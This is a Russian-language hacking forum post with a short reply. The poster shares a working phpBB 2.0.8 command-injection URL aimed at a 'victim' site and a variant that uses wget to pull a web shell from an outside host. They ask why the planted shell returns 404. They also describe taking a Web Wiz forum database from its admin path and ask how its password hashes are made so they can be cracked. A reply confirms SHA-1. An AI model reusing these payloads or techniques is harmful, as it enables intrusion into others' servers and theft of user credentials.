Прошу прощение за небольшое повторение, у меня 2 проблемы:

1. Есть форум на дырявом движке PHPBB 2.0.8
Эксплойт для SQL Injection прокатывает. Вот он:

www.victim.ru/forum/viewtopic.php?xxx=/*здесь команда*/&p=12&highlight=%2527.system($_GET[xxx]).include%2527

Так вот, работает большинство команд (ls выдает содержимое, pwd говорит мне о моем месторасположении), однако невозможно закачать шелл с сайта (допустим, http://myshell.narod.ru/shell.php)
т.е. я набираю в браузере

viewtopic.php?xxx=wget http://myshell.narod.ru/shell.php&p=12&highlight=%2527.system($_GET[xxx]).include%2527

Затем, обращаюсь к шеллу:

www.victim.ru/forum/shell.php

и получаю ошибку 404. Нет такого файла на сервере.

Такая ситуация встретилась на двух серверах. Обе машины под управлением FreeBSD, о чем говорит uname.

С чем это может быть связано, и может, кто-то сможет мне указать на ошибки в эксплуатации этой уязвимости))

2. Удалось скачать базу данных с одного форума от web wiz 2.0.7
(/admin/database/wwForum.mdb)
Каким алгоритмом хешируются пароли в этой базе? Есть подозрение, что это SHA-1, так как PasswordPRO наиболее корректно отображает хеши из базы именно, как SHA-1 хеши. Это так?

2. Удалось скачать базу данных с одного форума от web wiz 2.0.7
(/admin/database/wwForum.mdb)
Каким алгоритмом хешируются пароли в этой базе? Есть подозрение, что это SHA-1, так как PasswordPRO наиболее корректно отображает хеши из базы именно, как SHA-1 хеши. Это так?

Да, это SHA-1. А с 4его ты взял, 4то PP коректно с ними работает? он только с md4,md5 и мускульными хэшами работает!